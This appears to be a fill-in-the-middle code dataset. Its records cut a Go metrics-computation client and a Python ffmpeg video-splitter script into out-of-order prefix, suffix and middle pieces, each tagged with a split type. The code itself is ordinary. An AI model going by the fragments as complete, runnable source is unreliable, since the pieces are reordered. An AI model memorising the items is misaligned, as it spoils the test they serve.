// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error
|
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok {
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will
|
{
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
|
identifier_body
|
computation.go
|
imitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MaxDelay(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error {
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok
|
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will
|
{
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
|
conditional_block
|
computation.go
|
limitSize asyncMetadata[int]
matchedNoTimeseriesQuery asyncMetadata[string]
groupByMissingProperties asyncMetadata[[]string]
tsidMetadata map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]
}
// ComputationError exposes the underlying metadata of a computation error
type ComputationError struct {
Code int
Message string
ErrorType string
}
func (e *ComputationError) Error() string {
err := fmt.Sprintf("%v", e.Code)
if e.ErrorType != "" {
err = fmt.Sprintf("%v (%v)", e.Code, e.ErrorType)
}
if e.Message != "" {
err = fmt.Sprintf("%v: %v", err, e.Message)
}
return err
}
func newComputation(channel <-chan messages.Message, name string, client *Client) *Computation {
comp := &Computation{
channel: channel,
name: name,
client: client,
dataCh: make(chan *messages.DataMessage),
dataChBuffer: make(chan *messages.DataMessage),
eventCh: make(chan *messages.EventMessage),
eventChBuffer: make(chan *messages.EventMessage),
expirationCh: make(chan *messages.ExpiredTSIDMessage),
expirationChBuffer: make(chan *messages.ExpiredTSIDMessage),
tsidMetadata: make(map[idtool.ID]*asyncMetadata[*messages.MetadataProperties]),
}
go bufferMessages(comp.dataChBuffer, comp.dataCh)
go bufferMessages(comp.expirationChBuffer, comp.expirationCh)
go bufferMessages(comp.eventChBuffer, comp.eventCh)
go func() {
err := comp.watchMessages()
if !errors.Is(err, errChannelClosed) {
comp.errMutex.Lock()
comp.lastError = err
comp.errMutex.Unlock()
}
comp.shutdown()
}()
return comp
}
// Handle of the computation. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Handle(ctx context.Context) (string, error) {
return c.handle.Get(ctx)
}
// Resolution of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Resolution(ctx context.Context) (time.Duration, error) {
resMS, err := c.resolutionMS.Get(ctx)
return time.Duration(resMS) * time.Millisecond, err
}
// Lag detected for the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) Lag(ctx context.Context) (time.Duration, error) {
lagMS, err := c.lagMS.Get(ctx)
return time.Duration(lagMS) * time.Millisecond, err
}
// MaxDelay detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation)
|
(ctx context.Context) (time.Duration, error) {
maxDelayMS, err := c.maxDelayMS.Get(ctx)
return time.Duration(maxDelayMS) * time.Millisecond, err
}
// MatchedSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) MatchedSize(ctx context.Context) (int, error) {
return c.matchedSize.Get(ctx)
}
// LimitSize detected of the job. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) LimitSize(ctx context.Context) (int, error) {
return c.limitSize.Get(ctx)
}
// MatchedNoTimeseriesQuery if it matched no active timeseries. Will wait as long as the given ctx
// is not closed. If ctx is closed an error will be returned.
func (c *Computation) MatchedNoTimeseriesQuery(ctx context.Context) (string, error) {
return c.matchedNoTimeseriesQuery.Get(ctx)
}
// GroupByMissingProperties are timeseries that don't contain the required dimensions. Will wait as
// long as the given ctx is not closed. If ctx is closed an error will be returned.
func (c *Computation) GroupByMissingProperties(ctx context.Context) ([]string, error) {
return c.groupByMissingProperties.Get(ctx)
}
// TSIDMetadata for a particular tsid. Will wait as long as the given ctx is not closed. If ctx is closed an
// error will be returned.
func (c *Computation) TSIDMetadata(ctx context.Context, tsid idtool.ID) (*messages.MetadataProperties, error) {
c.Lock()
if _, ok := c.tsidMetadata[tsid]; !ok {
c.tsidMetadata[tsid] = &asyncMetadata[*messages.MetadataProperties]{}
}
md := c.tsidMetadata[tsid]
c.Unlock()
return md.Get(ctx)
}
// Err returns the last fatal error that caused the computation to stop, if
// any. Will be nil if the computation stopped in an expected manner.
func (c *Computation) Err() error {
c.errMutex.RLock()
defer c.errMutex.RUnlock()
return c.lastError
}
func (c *Computation) watchMessages() error {
for {
m, ok := <-c.channel
if !ok {
return nil
}
if err := c.processMessage(m); err != nil {
return err
}
}
}
var errChannelClosed = errors.New("computation channel is closed")
func (c *Computation) processMessage(m messages.Message) error {
switch v := m.(type) {
case *messages.JobStartControlMessage:
c.handle.Set(v.Handle)
case *messages.EndOfChannelControlMessage, *messages.ChannelAbortControlMessage:
return errChannelClosed
case *messages.DataMessage:
c.dataChBuffer <- v
case *messages.ExpiredTSIDMessage:
c.Lock()
delete(c.tsidMetadata, idtool.IDFromString(v.TSID))
c.Unlock()
c.expirationChBuffer <- v
case *messages.InfoMessage:
switch v.MessageBlock.Code {
case messages.JobRunningResolution:
c.resolutionMS.Set(v.MessageBlock.Contents.(messages.JobRunningResolutionContents).ResolutionMS())
case messages.JobDetectedLag:
c.lagMS.Set(v.MessageBlock.Contents.(messages.JobDetectedLagContents).LagMS())
case messages.JobInitialMaxDelay:
c.maxDelayMS.Set(v.MessageBlock.Contents.(messages.JobInitialMaxDelayContents).MaxDelayMS())
case messages.FindLimitedResultSet:
c.matchedSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).MatchedSize())
c.limitSize.Set(v.MessageBlock.Contents.(messages.FindLimitedResultSetContents).LimitSize())
case messages.FindMatchedNoTimeseries:
c.matchedNoTimeseriesQuery.Set(v.MessageBlock.Contents.(messages.FindMatchedNoTimeseriesContents).MatchedNoTimeseriesQuery())
case messages.GroupByMissingProperty:
c.groupByMissingProperties.Set(v.MessageBlock.Contents.(messages.GroupByMissingPropertyContents).GroupByMissingProperties())
}
case *messages.ErrorMessage:
rawData := v.RawData()
computationError := ComputationError{}
if code, ok := rawData["error"]; ok {
computationError.Code = int(code.(float64))
}
if msg, ok := rawData["message"]; ok && msg != nil {
computationError.Message = msg.(string)
}
if errType, ok := rawData["errorType"]; ok {
computationError.ErrorType = errType.(string)
}
return &computationError
case *messages.MetadataMessage:
c.Lock()
if _, ok := c.tsidMetadata[v.TSID]; !ok {
c.tsidMetadata[v.TSID] = &asyncMetadata[*messages.MetadataProperties]{}
}
c.tsidMetadata[v.TSID].Set(&v.Properties)
c.Unlock()
case *messages.EventMessage:
c.eventChBuffer <- v
}
return nil
}
func bufferMessages[T any](in chan *T, out chan *T) {
buffer := make([]*T, 0)
var nextMessage *T
defer func() {
if nextMessage != nil {
out <- nextMessage
}
for i := range buffer {
out <- buffer[i]
}
close(out)
}()
for {
if len(buffer) > 0 {
if nextMessage == nil {
nextMessage, buffer = buffer[0], buffer[1:]
}
select {
case out <- nextMessage:
nextMessage = nil
case msg, ok := <-in:
if !ok {
return
}
buffer = append(buffer, msg)
}
} else {
msg, ok := <-in
if !ok {
return
}
buffer = append(buffer, msg)
}
}
}
// Data returns the channel on which data messages come. This channel will be closed when the
// computation is finished. To prevent goroutine leaks, you should read all messages from this
// channel until it is closed.
func (c *Computation) Data() <-chan *messages.DataMessage {
return c.dataCh
}
// Expirations returns a channel that will be sent messages about expired TSIDs, i.e. time series
// that are no longer valid for this computation. This channel will
|
MaxDelay
|
identifier_name
|
ffmpeg_video_splitter.py
|
Command(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.filter_complex_list.append(filter_complex_option)
def GetTimeDiff(dt_start, dt_end):
time_difference = dt_end.total_seconds() - dt_start.total_seconds()
if time_difference <= 0:
raise Exception("Time difference less than 0: " + str(time_difference))
return datetime.timedelta(seconds=time_difference)
def ConvertTimestampToTimeDelta(timestamp_str):
time_split = timestamp_str.split(":")
time_split.reverse()
total_seconds = float(time_split[0])
for index in range(1, len(time_split)):
total_seconds += int(time_split[index]) * (60 ** index)
time_dt = datetime.timedelta(seconds=total_seconds)
return time_dt
def ConvertToDateTime(datetime_str):
date, time = datetime_str.split(" ", 1)
year, month, day = date.split('-')
hour, minute, second = time.split('-')
date_time = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))
return date_time
def CreateDirectory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def RemoveDirectory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
def DeleteFile( path ):
try:
os.remove(path)
except FileNotFoundError:
pass
def ParseConfig( config_blocks, base_output_folder, config_folder ):
if verbose:
print( "Parsing Config" )
full_root_folder = config_folder
full_output_folder = base_output_folder
force_file_ext = False
time_stamp = None
video_list = []
for block_obj in config_blocks:
if block_obj.key == "$base_output_folder" or block_obj.key == "$output_folder":
base_output_folder = os.path.normpath( block_obj.value ) + os.sep
full_output_folder = base_output_folder
elif block_obj.key == "$append_output_folder":
if os.path.isabs( block_obj.value ):
full_output_folder = os.path.normpath( block_obj.value )
else:
full_output_folder = os.path.normpath( base_output_folder + block_obj.value )
elif block_obj.key == "$force_file_ext":
force_file_ext = block_obj.value
elif block_obj.key == "$include":
include_config = lexer.ReadFile(block_obj.value)
config_path = os.path.join(full_root_folder, os.path.split(block_obj.value)[0])
include_video_list, base_output_folder = ParseConfig(include_config, base_output_folder, config_path)
video_list.extend(include_video_list)
elif block_obj.key in {"$input_video_folder", "$input_folder"}:
if os.path.isabs( block_obj.value ):
full_root_folder = os.path.normpath( block_obj.value ) + os.sep
else:
full_root_folder = os.path.normpath( config_folder + block_obj.value ) + os.sep
# is a video file
else:
video_file = VideoFile( block_obj.key, full_root_folder, config_folder,
full_output_folder, force_file_ext )
if block_obj.items:
AddInputVideosToVideo( video_file, block_obj )
video_list.append(video_file)
video_file.crc_list.append(GetCRC(base_output_folder))
video_file.crc_list.append(GetCRC(str(final_encode)))
if not os.path.isfile(video_file.full_path):
continue
elif not CheckCRC(video_file, video_file.crc_list):
video_file.skip = True
return video_list, base_output_folder
def AddInputVideosToVideo( video_file, block_obj ):
for input_video_block in block_obj.items:
crc_list = []
input_video_block.key = os.path.normpath( input_video_block.key )
if input_video_block.key == "$time":
# TODO: maybe if the value is 'self', use the input video date modified?
|
# and what if there is more than one video?
time_stamp = ConvertToDateTime(input_video_block.value)
video_file.time = time_stamp
elif input_video_block.key == "$ffmpeg_cmd":
video_file.global_ffmpeg_cmd.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif input_video_block.key == "$no_filter_complex_default":
video_file.use_filter_complex_default = False
elif input_video_block.key == "$filter_complex":
video_file.global_filter_complex.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif ":" in input_video_block.key and not os.sep in input_video_block.key:
video_file.AddInputVideo( video_file.raw_path )
crc_list.append( GetCRC(video_file.raw_path) )
crc_list = AddInputVideoSetting( video_file, input_video_block, crc_list )
else:
video_file.AddInputVideo(input_video_block.key, False)
for in_video_item in input_video_block.items:
crc_list = AddInputVideoSetting( video_file, in_video_item, crc_list )
video_file.crc_list.extend( crc_list )
return
def AddInputVideoSetting( video_file, in_video_item, crc_list ):
if in_video_item.key == "$ffmpeg_cmd":
video_file.AddFFMpegCommand(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
elif in_video_item.key == "$filter_complex":
video_file.AddFFMpegFilterComplex(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
else:
video_file.AddTimeRange(in_video_item.key, in_video_item.value)
crc_list.append(GetCRC(in_video_item.key))
crc_list.append(GetCRC(in_video_item.value))
return crc_list
# some shitty thing to print what we just parsed
def PrintTimestampsFile( video_list, out_folder ):
cmd_bar_line = "-----------------------------------------------------------"
print( cmd_bar_line )
if verbose:
print( "Timestamps File" )
print( cmd_bar_line )
for out_video in video_list:
print( out_video.path )
for in_video in out_video.input_videos:
print( " " + in_video.raw_path )
for time_range in in_video.time_ranges:
print( " " + str(time_range[0]) + " - " + str(time_range[1]) )
print( "" )
print( "Default Output Folder: " + out_folder )
if final_encode:
print( "Final Encode - Using H265 - CRF 8 - Slow Preset" )
else:
print( "Quick Encode - Using H264 - CRF 24 - Ultrafast Preset" )
print( cmd_bar_line )
return
def RunFFMpegConCat(temp_path, sub_video_list, out_video):
# stuff for ffmpeg concat shit
temp_file = temp_path + "temp.txt"
with open(temp_file, "w", encoding="utf-8") as temp_file_io:
for sub_video in sub_video_list:
temp_file_io.write("file '" + sub_video + "'\n")
metadata = []
if out_video.time:
metadata.append('-metadata date="' + str(out_video.time).replace(':', '-') + '"')
ffmpeg_command = (
ffmpeg_bin + "ffmpeg -y -hide_banner",
"-safe 0 -f concat -i \"" + temp_file + '"',
"-c copy -map 0",
*metadata,
'"' + out_video.full_path + '"'
)
RunFFMpeg(out_video.full_path, ' '.join(ffmpeg_command))
if verbose:
print("Created Output Video")
if out_video.time:
ReplaceDateModified(out_video.full_path, out_video.time.timestamp())
if verbose:
print("Changed Date Modified")
os.remove(temp_file)
def RunFFMpegSubVideo( time_range_number, input_video, temp_video, use_filter_complex_default ):
dt_start, dt_end, dt_diff = input_video.GetTimeRange( time_range_number )
time_start = str(dt_start)
time_end = str(dt_end)
time_diff = str(dt_diff)
video_len = GetVideoLength(input_video.abspath)
if video_len < dt_start:
raise Exception( "start time bad" )
ffmpeg_command = [
ffmpeg_bin + "ffmpeg",
"-y -hide_banner",
"-ss " + time_start,
'-i "' + input_video.abspath + '"',
"-map 0:v"
]
# get audio track count
audio_tracks = GetAudioTrackCount(input_video.abspath)
if final_encode:
ffmpeg_command.append("-c:v libx265")
ffmpeg_command.append("-crf 8")
ffmpeg_command.append("-preset slow")
else:
ffmpeg_command.append("-c:v libx264")
ffmpeg_command.append("-crf 24")
ffmpeg_command.append("-preset ultrafast")
# TODO: make sure the output colors are not messed up with this
# shadowplay color range: Limited
# shadowplay color primaries: BT.601 NTSC
# shadowplay color space: YUV
# shadowplay standard: PAL
# what does this do?
# "-h full"
# this stretches the color range i think, so it looks
|
# you might not be able to get a date modified due to no input videos being added, oof
|
random_line_split
|
ffmpeg_video_splitter.py
|
Command(self,ffmpeg_cmd):
ffmpeg_cmd = ffmpeg_cmd.replace("'", "\"")
self.ffmpeg_cmd_line.append(ffmpeg_cmd)
def AddFFMpegFilterComplex(self,filter_complex_option):
self.filter_complex_list.append(filter_complex_option)
def GetTimeDiff(dt_start, dt_end):
time_difference = dt_end.total_seconds() - dt_start.total_seconds()
if time_difference <= 0:
raise Exception("Time difference less than 0: " + str(time_difference))
return datetime.timedelta(seconds=time_difference)
def ConvertTimestampToTimeDelta(timestamp_str):
time_split = timestamp_str.split(":")
time_split.reverse()
total_seconds = float(time_split[0])
for index in range(1, len(time_split)):
total_seconds += int(time_split[index]) * (60 ** index)
time_dt = datetime.timedelta(seconds=total_seconds)
return time_dt
def ConvertToDateTime(datetime_str):
date, time = datetime_str.split(" ", 1)
year, month, day = date.split('-')
hour, minute, second = time.split('-')
date_time = datetime.datetime(int(year), int(month), int(day), int(hour), int(minute), int(second))
return date_time
def
|
(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def RemoveDirectory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
def DeleteFile( path ):
try:
os.remove(path)
except FileNotFoundError:
pass
def ParseConfig( config_blocks, base_output_folder, config_folder ):
if verbose:
print( "Parsing Config" )
full_root_folder = config_folder
full_output_folder = base_output_folder
force_file_ext = False
time_stamp = None
video_list = []
for block_obj in config_blocks:
if block_obj.key == "$base_output_folder" or block_obj.key == "$output_folder":
base_output_folder = os.path.normpath( block_obj.value ) + os.sep
full_output_folder = base_output_folder
elif block_obj.key == "$append_output_folder":
if os.path.isabs( block_obj.value ):
full_output_folder = os.path.normpath( block_obj.value )
else:
full_output_folder = os.path.normpath( base_output_folder + block_obj.value )
elif block_obj.key == "$force_file_ext":
force_file_ext = block_obj.value
elif block_obj.key == "$include":
include_config = lexer.ReadFile(block_obj.value)
config_path = os.path.join(full_root_folder, os.path.split(block_obj.value)[0])
include_video_list, base_output_folder = ParseConfig(include_config, base_output_folder, config_path)
video_list.extend(include_video_list)
elif block_obj.key in {"$input_video_folder", "$input_folder"}:
if os.path.isabs( block_obj.value ):
full_root_folder = os.path.normpath( block_obj.value ) + os.sep
else:
full_root_folder = os.path.normpath( config_folder + block_obj.value ) + os.sep
# is a video file
else:
video_file = VideoFile( block_obj.key, full_root_folder, config_folder,
full_output_folder, force_file_ext )
if block_obj.items:
AddInputVideosToVideo( video_file, block_obj )
video_list.append(video_file)
video_file.crc_list.append(GetCRC(base_output_folder))
video_file.crc_list.append(GetCRC(str(final_encode)))
if not os.path.isfile(video_file.full_path):
continue
elif not CheckCRC(video_file, video_file.crc_list):
video_file.skip = True
return video_list, base_output_folder
def AddInputVideosToVideo( video_file, block_obj ):
for input_video_block in block_obj.items:
crc_list = []
input_video_block.key = os.path.normpath( input_video_block.key )
if input_video_block.key == "$time":
# TODO: maybe if the value is 'self', use the input video date modified?
# you might not be able to get a date modified due to no input videos being added, oof
# and what if there is more than one video?
time_stamp = ConvertToDateTime(input_video_block.value)
video_file.time = time_stamp
elif input_video_block.key == "$ffmpeg_cmd":
video_file.global_ffmpeg_cmd.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif input_video_block.key == "$no_filter_complex_default":
video_file.use_filter_complex_default = False
elif input_video_block.key == "$filter_complex":
video_file.global_filter_complex.append(input_video_block.value)
crc_list.append(GetCRC(input_video_block.value))
elif ":" in input_video_block.key and not os.sep in input_video_block.key:
video_file.AddInputVideo( video_file.raw_path )
crc_list.append( GetCRC(video_file.raw_path) )
crc_list = AddInputVideoSetting( video_file, input_video_block, crc_list )
else:
video_file.AddInputVideo(input_video_block.key, False)
for in_video_item in input_video_block.items:
crc_list = AddInputVideoSetting( video_file, in_video_item, crc_list )
video_file.crc_list.extend( crc_list )
return
def AddInputVideoSetting( video_file, in_video_item, crc_list ):
if in_video_item.key == "$ffmpeg_cmd":
video_file.AddFFMpegCommand(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
elif in_video_item.key == "$filter_complex":
video_file.AddFFMpegFilterComplex(in_video_item.value)
crc_list.append(GetCRC(in_video_item.value))
else:
video_file.AddTimeRange(in_video_item.key, in_video_item.value)
crc_list.append(GetCRC(in_video_item.key))
crc_list.append(GetCRC(in_video_item.value))
return crc_list
# some shitty thing to print what we just parsed
def PrintTimestampsFile( video_list, out_folder ):
cmd_bar_line = "-----------------------------------------------------------"
print( cmd_bar_line )
if verbose:
print( "Timestamps File" )
print( cmd_bar_line )
for out_video in video_list:
print( out_video.path )
for in_video in out_video.input_videos:
print( " " + in_video.raw_path )
for time_range in in_video.time_ranges:
print( " " + str(time_range[0]) + " - " + str(time_range[1]) )
print( "" )
print( "Default Output Folder: " + out_folder )
if final_encode:
print( "Final Encode - Using H265 - CRF 8 - Slow Preset" )
else:
print( "Quick Encode - Using H264 - CRF 24 - Ultrafast Preset" )
print( cmd_bar_line )
return
def RunFFMpegConCat(temp_path, sub_video_list, out_video):
# stuff for ffmpeg concat shit
temp_file = temp_path + "temp.txt"
with open(temp_file, "w", encoding="utf-8") as temp_file_io:
for sub_video in sub_video_list:
temp_file_io.write("file '" + sub_video + "'\n")
metadata = []
if out_video.time:
metadata.append('-metadata date="' + str(out_video.time).replace(':', '-') + '"')
ffmpeg_command = (
ffmpeg_bin + "ffmpeg -y -hide_banner",
"-safe 0 -f concat -i \"" + temp_file + '"',
"-c copy -map 0",
*metadata,
'"' + out_video.full_path + '"'
)
